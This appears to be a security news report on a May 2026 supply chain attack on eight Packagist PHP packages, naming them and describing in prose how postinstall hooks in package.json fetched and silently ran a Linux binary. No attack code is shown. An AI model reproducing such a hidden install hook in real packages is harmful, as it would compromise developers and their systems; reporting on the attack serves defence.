MAY 23, 2026 — A coordinated software supply chain attack has compromised eight packages on Packagist, the main repository for PHP dependencies, after attackers injected malicious code designed to download and execute a Linux binary hosted on GitHub Releases.
Security researchers say the campaign highlights an evolving tactic in which attackers blur boundaries between programming ecosystems to evade detection and maximize impact.
Malicious Code Hidden Outside Composer Files
According to security firm Socket, the affected packages were standard Composer (PHP) libraries, but the malicious code was not placed in typical PHP dependency configuration files such as composer.json.
Instead, attackers inserted harmful scripts into package.json, a file commonly associated with JavaScript projects. This allowed the malware to bypass some security scans focused only on PHP metadata, while still executing in environments where JavaScript tooling is present alongside PHP applications.
Experts describe this as a “cross-ecosystem attack technique,” where threat actors exploit multiple package formats within a single project to avoid detection.
Malware Downloaded from GitHub Releases
The compromised packages were modified to include a post-installation script that executes automatically after installation. This script:
- Downloads a Linux binary from a GitHub Releases URL
- Saves it in a temporary system directory (
/tmp/.sshd)
- Changes file permissions to make it executable
- Runs the binary silently in the background
The GitHub repository linked to the payload has since been removed, making it difficult for researchers to fully analyze the final-stage malware.
Affected Packages Identified
The attack impacted multiple widely used development packages, including:
- moritz-sauer-13/silverstripe-cms-theme
- crosiersource/crosierlib-base
- devdojo/wave
- devdojo/genesis
- katanaui/katana
- elitedevsquad/sidecar-laravel
- r2luna/brain
- baskarcm/tzi-chat-ui
Security analysts note that all compromised versions were tied to development or “dev-main” branches, which are often less strictly monitored than stable releases.
Attack Spreads Across GitHub Ecosystem
Investigators found references to the malicious payload in at least 777 files across GitHub, suggesting the campaign may be more widespread than initially detected. In some cases, the payload was also embedded within GitHub Actions workflows, allowing execution during automated build processes.
This indicates the attackers were not relying on a single method of execution, but instead attempting to activate the malware through multiple development pipelines.
Security Risks and Impact
The malicious installer is capable of executing remote code during package installation or build stages. Security researchers warn that even without the final payload, the script itself poses a serious risk because it can:
- Execute arbitrary commands during installation
- Disable TLS verification checks
- Suppress error messages to avoid detection
- Run hidden background processes
Experts say these behaviors are typical of advanced supply chain attacks designed to maintain persistence and evade security tools.
Growing Threat to Open-Source Ecosystems
The incident reflects a broader rise in supply chain attacks targeting open-source ecosystems such as npm, Packagist, and PyPI. Attackers increasingly exploit trusted development tools and dependencies to infiltrate software pipelines used by millions of applications worldwide.
Security researchers are urging developers to audit installation scripts carefully, restrict execution of post-install hooks, and monitor third-party dependencies for unexpected changes.
